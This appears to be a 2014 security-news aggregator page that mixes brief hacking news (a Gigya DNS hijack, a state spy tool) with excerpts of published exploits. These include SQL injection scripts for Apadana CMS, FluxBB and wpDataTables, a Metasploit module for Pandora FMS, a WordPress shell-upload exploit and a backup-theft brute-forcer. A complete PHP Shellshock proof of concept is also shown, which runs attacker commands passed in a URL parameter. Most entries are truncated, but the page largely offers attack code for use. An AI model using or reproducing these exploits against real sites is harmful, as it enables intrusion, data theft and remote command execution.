Websites worldwide under hacker attack, including Repubblica.it

27 November 2014 - Source: http://www.mondounix.com


Repubblica.it and the websites of the Gruppo Espresso local newspapers were the target of an indirect hacker attack, carried out through code from Gigya, a US company that provides reader comment functionality worldwide.
Gigya was probably targeted because it also has offices in Israel.
The attack was carried out through the company's DNS, that is, by redirecting user requests to a computer controlled by the hackers.

The attack affected many websites around the world.
The website of the British newspaper The Independent was also attacked, like those...


Apadana CMS SQL Injection

26 November 2014 - Source: http://www.mondounix.com
[0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0]
[0]
[0] Exploit Title : Apadana CMS Sql Injection Vulnerability
[0] Exploit Author : SeRaVo.BlackHat
[0] Vendor Homepage : http://www.apadanacms.ir/
[0] Google Dork : powered by apadana CMS
[0] Date: 2014/November/25
[0] Tested On : windows + linux | Mozila | Havij
[0] Software Link : http://www.itsecteam.com/products/havij-advanced-sql-injection/
[0]
[0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0]
[0]
[0]     ::::::::::::::::::::::::::::::::::::::::::::::::::::::::
[0]     :::       Apadana CMS Sql Injection Vulnerability    :::
[0]     ::::::::::::::::::::::::::::::::::::::::::::::::::::::::
[0]...


Pandora FMS SQL Injection Remote Code Execution

26 November 2014 - Source: http://www.mondounix.com
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper
 
  def initialize(info={})
    super(update_info(info,
      'Name'           => 'Pandora FMS SQLi Remote Code Execution',
      'Description'    => %q{
        This module attempts to exploit multiple issues in order to gain remote
        code execution under Pandora FMS version <= 5.0 SP2.  First, an attempt
        to authenticate using default credentials is performed.  If this method
...


WordPress Html5 Mp3 Player Full Path Disclosure

26 November 2014 - Source: http://www.mondounix.com
WordPress - (Html5 Mp3 Player with Playlist) Plugin <= Full Path Disclosure
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockout@e-mail.com.tr
[~] HomePage : http://h4x0resec.blogspot.com
[~] Greetz :  Septemb0x , BARCOD3 , _UnDeRTaKeR_ , BackDoor, 
              DaiMon, PRoMaX, ZoRLu, ( milw00rm.com )
                .__        _____        _______                
                |  |__    /  |  |___  __\   _  \_______   ____ 
                |  |  \  /   |  |\  \/  /  /_\  \_  __ \_/ __ \
                |   Y  \/    ^   />    <\  \_/   \  | \/\  ___/
                |___|  /\____   |/__/\_ \\_____  /__|    \___  >
                     \/      |__|      \/      \/...


FluxBB 1.5.6 SQL Injection

26 November 2014 - Source: http://www.mondounix.com
#!/usr/bin/env python
# Friday, November 21, 2014 - secthrowaway@safe-mail.net
# FluxBB <= 1.5.6 SQL Injection
# make sure that your IP is reachable
 
url  = 'http://target.tld/forum/'
user = 'user' # dummy account
pwd  = 'test' 
 
import urllib, sys, smtpd, asyncore, re, sha
from email import message_from_string
from urllib2 import Request, urlopen
 
ua = "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36"
bindip = '0.0.0.0'
 
def stage1(sql):
  if len(sql) > 80:
    sys.exit('SQL too long, max 80 chars')
  print "1st stage: %s (%d chars)" % (sql, len(sql))
  r = urlopen(Request('%sprofile.php?action=change_email&id=%s'...


WordPress wpDataTables 1.5.3 Shell Upload

26 November 2014 - Source: http://www.mondounix.com
#!/usr/bin/python
#
# Exploit Name: Wordpress wpDataTables 1.5.3 and below Unauthenticated Shell Upload Vulnerability
# 
# Vulnerability discovered by Claudio Viviani
#
# Date : 2014-11-22
#
# Exploit written by Claudio Viviani
#
# Video Demo: https://www.youtube.com/watch?v=44m4VNpeEVc
#
# --------------------------------------------------------------------
#
# Issue n.1 (wpdatatables.php)
#
# This function is always available without wpdatatables edit permission:
#
#    function wdt_upload_file(){
#        require_once(PDT_ROOT_PATH.'lib/upload/UploadHandler.php');
#        $uploadHandler = new UploadHandler();
#        exit();
#    }
#    ...
#    ...
#    ...
#    add_action( 'wp_ajax_wdt_upload_file', 'wdt_upload_file'...


WordPress wpDataTables 1.5.3 SQL Injection

26 November 2014 - Source: http://www.mondounix.com
######################
# Exploit Title : Wordpress wpDataTables 1.5.3 and below SQL Injection Vulnerability
# Exploit Author : Claudio Viviani 
# Software Link : http://wpdatatables.com (Premium)
# Date : 2014-11-22
# Tested on : Windows 7 / Mozilla Firefox
              Windows 7 / sqlmap (0.8-1)
              Linux / Mozilla Firefox
              Linux / sqlmap 1.0-dev-5b2ded0
######################
 
# Description
 
Wordpress wpDataTables 1.5.3 and below suffers from an SQL injection vulnerability
 
"table_id" variable is not sanitized.
 
File: wpdatatables.php
------------------------
    // AJAX-handlers
    add_action( 'wp_ajax_get_wdtable', 'wdt_get_ajax_data' );
    add_action( 'wp_ajax_nopriv_get_wdtable',...


WordPress WP-DB-Backup 2.2.4 Backup Theft

26 November 2014 - Source: http://www.mondounix.com
#!/bin/bash
#Larry W. Cashdollar, @_larry0
#Will brute force and search a Wordpress target site with WP-DB-Backup v2.2.4 plugin installed for any backups done on
#20141031 assumes the wordpress database is wordpress and the table prefix is wp_
#http://www.vapid.dhs.org/advisories/wordpress/plugins/wp-db-backup-v2.2.4/
#http://thehackerblog.com/auditing-wp-db-backup-wordpress-plugin-why-using-the-database-password-for-entropy-is-a-bad-idea/
#run ./exp targetsite
 
DATE="20141031"; #Date to search
 
if [ ! -e rainbow ]; then
 
cat << -EOF- > rbow.c
/*Create rainbow table for guessing wp-backup-db v2.2.4 backup path 
Larry W. Cashdollar*/
#include <stdio.h>
int
main (void)
{
  char string[16]...


PHP 5.x / Bash Shellshock Proof Of Concept

26 November 2014 - Source: http://www.mondounix.com
<?php
 
// Exploit Title: PHP 5.x and GNU Bash <= 4.3 Shellshock Exploit
// Date: 22/11/2014
// Exploit Author: ssbostan
// Vendor Homepage: http://www.gnu.org/software/bash/
// Software Link: http://ftp.gnu.org/gnu/bash/
// Version: <= 4.3
// Tested on: Fedora 17, Ubuntu 8.04
// CVE: http://www.cvedetails.com/cve/CVE-2014-6271/
 
if(isset($_GET["cmd"]) && !empty($_GET["cmd"]))
{
  $file=tempnam("/tmp", "xpl");
  putenv("PHP_XPL=() { :;}; {$_GET["cmd"]}>{$file}");
  mail("xpl@localhost", "", "", "", "-bv");
  echo file_get_contents($file);
  unlink($file);
}
 
?>


Researchers Uncover Government Spy Tool Used to Hack Telecoms and Belgian Cryptographer

24 November 2014 - Source: http://www.mondounix.com

It was the spring of 2011 when the European Commission discovered it had been hacked. The intrusion into the EU’s legislative body was sophisticated and widespread and used a zero-day exploit to get in. Once the attackers established a stronghold on the network, they were in for the long haul. They scouted the network architecture for additional victims and covered their tracks well. Eventually, they infected numerous systems belonging to the European Commission and the European Council before being discovered.

Two years later another big target was hacked. This time it was Belgacom, the partly state-owned Belgian...
